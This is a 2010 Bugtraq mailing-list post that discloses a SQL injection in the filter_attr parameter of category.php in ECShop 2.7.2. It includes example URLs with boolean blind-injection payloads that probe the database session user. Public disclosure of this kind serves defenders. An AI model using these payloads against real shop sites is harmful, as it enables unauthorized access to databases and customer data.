lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <SNT122-W583786C5C8CF263B16EA71A6F60@phx.gbl> Date: Thu, 6 May 2010 23:35:40 -0700 From: lis cker <liscker@...mail.com> To: <bugtraq@...urityfocus.com> Subject: Injection of ECShop apps. ECSHOP is one of the most famous shopping apps of china. The last vesion of ECShop is V2.7.2. It has a OR_NUM type injection in filter_attr Parameter of category.php. For example: http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC#goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999 Test it : http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2 http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=15%20or%201=2 Liscker 2010.05.07